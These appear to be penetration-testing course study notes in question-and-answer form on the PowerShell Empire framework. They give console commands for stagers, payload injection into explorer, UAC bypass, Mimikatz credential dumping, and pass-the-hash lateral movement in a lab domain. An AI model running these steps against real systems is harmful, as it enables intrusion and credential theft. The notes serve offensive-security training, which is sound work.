PowerShell Empire

Question 1

What is the name of the Github repository of Empire?

Answer 1

PowerShellEmpire

Question 2

How do you install Empire?

Answer 2

1. Clone Github repo
2. cd Empire
3. sudo ./setup/install.sh
4. sudo ./Empire

Question 3

How do you see a list of Empire listeners?

Answer 3

• • (Empire) > listeners

- - (Empire: listeners) > uselistener

Question 4

What are the available listeners in Empire?

Answer 4

• dbx
• http = most basic
• http_com
• http_foreign
• http_hop
• http_mapi
• meterpreter
• redirector = creates a pivot that enables communication with an internal network

Question 5

How do you select the http listener and select a Host listener IP of 10.11.0.4?

Answer 5

• • (Empire: listeners) > uselistener http
• • (Empire: listeners) > set Host 10.11.0.4
• • (Empire: listeners/http) > execute

Question 6

If you are in a selected listener, how to you return to the main Listener Menu?

Answer 6

(Empire: listeners/http) > back

Question 7

How can you list the available Stagers?

Answer 7

• ** Make sure you are in the Listener main menu ***

- - (Empire: listeners) > usestager

Question 8

What are some support examples that Empire Stagers provide?

Answer 8

• DLLs
• HTML applications
• Microsoft Office Macros

Question 9

How do you select the ‘windows/launcher_bat’ Stager for the HTTP Listener?

Answer 9

– (Empire: listeners) > usestager windows/launcher_bat
– Empire: stager/windows/launcher_bat) > set Listener http
– (Empire: stager/windows/launcher_bat) > execute
** Here is the output **
[] Stager output written out to: /tmp/launcher.bat
————————————–
** The Stager must then be copied to the target and executed

Question 10

How can we examine what the ‘windows/launcher_bat’ Stager does?

Answer 10

– kali@kali:/opt/Empire$ cat /tmp/launcher.bat

Question 11

What is an Empire ‘Agent’?

Answer 11

• the final payload retrieved by the Stager
• it allows us to execute commands and interact with the system
• the Stager deletes itself and exits once it finishes execution

Question 12

What happens once the ‘Agent’ is operational on the target?

Answer 12

• the ‘Agent’ will set up an AES-encrypted communication channel with the listener using the data portion of the HTTP GET and POST requests

Question 13

How do we get the ‘Agent’ operational on the target?

Answer 13

• We execute copy the Stager output to the target and execute it
• For example, launcher.bat
• • C:\Users\Offsec\Documents> launcher.bat

Question 14

Once the ‘Agent’ is operational, how do we view it in Empire?

Answer 14

(Empire: stager/windows/launcher_bat) > agents

Question 15

Once the ‘Agent’ is operational, how do we interact with it in Empire?

Answer 15

(Empire: agents) > interact S2Y5XW1L

Question 16

How do we migrate our payload into a process on the target from the ‘Agent’ interaction in Empire?

Answer 16

1. Display processes running on the target
   - - (Empire: S2Y5XW1L) > ps
2. Inject the Payload
   - - (Empire: S2Y5XW1L) > psinject http 3568
   - ————————————-
   * ** In the example, the process selected for payload injection was ‘explorer’ ***
   - ————————————-
3. See the new Agent is created
   - - (Empire: DWZ49BAP) > agents
4. Switch to the new Agent
   - - (Empire: agents) > interact DWZ49BAP
   - ————————————
   * ** You must switch to the new Agent that is generated after injecting the payload into the running process ***

Question 17

How do you list the available Empire modules?

Answer 17

– (Empire: S2Y5XW1L) > usemodule

Question 18

Which Empire module focuses on local client and AD enumeration?

Answer 18

situational_awareness

Question 19

What is the module path for Powerview?

Answer 19

situational_awareness/network/powerview

Question 20

How do you display the options of the module?

Answer 20

info

Question 21

What does it mean if the ‘NeedsAdmin’ field is set to ‘True’?

Answer 21

• the script requires local Administrators permissions

Question 22

What does it mean if the ‘OpsecSafe’ field is set to ‘True’?

Answer 22

• will avoid leaving behind indicators of compromise, such as temporary disk files or new user accounts

Question 23

What does it mean if the ‘MinLanguageVersion’ field is set to ‘True’?

Answer 23

• describes the minimum version of PowerShell required to execute the script
• ** Especially relevant with Windows 7 or Windows Server 2008 R2 that ship with PowerShell v.2

Question 24

What does it mean if the ‘Background’ field is set to ‘True’?

Answer 24

• the module executes in the background w/o visibility for the victim

Question 25

What does it mean if the 'OutputExtension' field is set to 'True'?

Answer 25

- tells us the output format if the module returns output to a file

Question 26

How would you initiate the 'get_user' module?

Answer 26

-- > (powershell/situational_awareness/ network/powerview/get_user) > execute

Question 27

What Empire module uses several techniques based on misconfigurations such as unquoted service paths and improper permissions on service executables? How do you initiate it?

Answer 27

- The 'allchecks' module within the 'privesc' category -- (Empire: powershell/situational_awareness/ network/powerview/get_user) > usemodule powe rshell/privesc/powerup/allchecks -- (Empire: powershell/privesc/powerup/ allchecks) > execute ----------------------------------------- *** 'allchecks' tells you is if this user is a local admin *** [*] Checking if user is in a local group with administrative privileges... [+] User is in a local group that grants administrative privileges! [+] Run a BypassUAC attack to elevate privileges to admin.

Question 28

Which Empire module can bypass UAC and launch a high-integrity PowerShell Empire agent? What is required to use this? How do you launch it?

Answer 28

- bypassuac_fodhelper module in the 'privesc' category - requires access to a local administrator account - - (Empire: S2Y5XW1L) > usemodule privesc/bypassuac_fodhelper - ----------------------------------------- - Then need to set the 'http' Listener - - (Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http - ----------------------------------------- - Finally, execute the module - - (Empire: powershell/privesc/bypassuac_fodhelper) > execute

Question 29

Which module category are the Mimikatz modules located?

Answer 29

- credentials

Question 30

What do the asterisks next to Mimikatz modules mean?

Answer 30

- they require a high-integrity Empire agent

Question 31

How does Empire load Mimikatz libraries into the agent? | Why does this help prevent detection?

Answer 31

- Empire uses reflective DLL injection to load the Mimikatz library into the agent directly from memory - Loading malicious executables in this way minimizes the risk of detection since most EDR solutions only analyze files stored on the hard drive

Question 32

``` What module allows you to get the passwords of logged on users? What command allows you to get passwords from logged on users? ```

Answer 32

- credentials/mimikatz/logonpasswords - mimikatz(powershell) # sekurlsa::logonpasswords - ------------------------------------- - To get the credentials that are written to the credential store, use 'creds' - - (Empire: K678VC13) > creds

Question 33

Once we have user credentials, what is our goal?

Answer 33

- lateral movement | - logon to additional systems until we reach our objective

Question 34

How can you use 'lateral_movement' module category to get a System shell?

Answer 34

- We can use the 'lateral_movement/invoke_ smbexec' module, with the following parameters: - - ComputerName = hostname of the Windows 10 client - - Listener = http - - Username = 'jeff_admin' - - Domain = 'corp.com' - - Hash = the 'jeff_admin' hash obtained from Mimikatz 'logonpasswords' module - ---------------------------------------- - - (Empire: K678VC13) > usemodule lateral_movement/invoke_smbexec - - (Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName client251 - - (Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http - - (Empire: powershell/lateral_movement/invoke_smbexec) > set Username jeff_admin - - (Empire: powershell/lateral_movement/invoke_smbexec) > set Hash e2b475c11da2a0748290d8 - - (Empire: powershell/lateral_movement/invoke_smbexec) > set Domain corp.com - - (Empire: powershell/lateral_movement/invoke_smbexec) > execute - - (Empire: agents) > interact UXVZ2NC3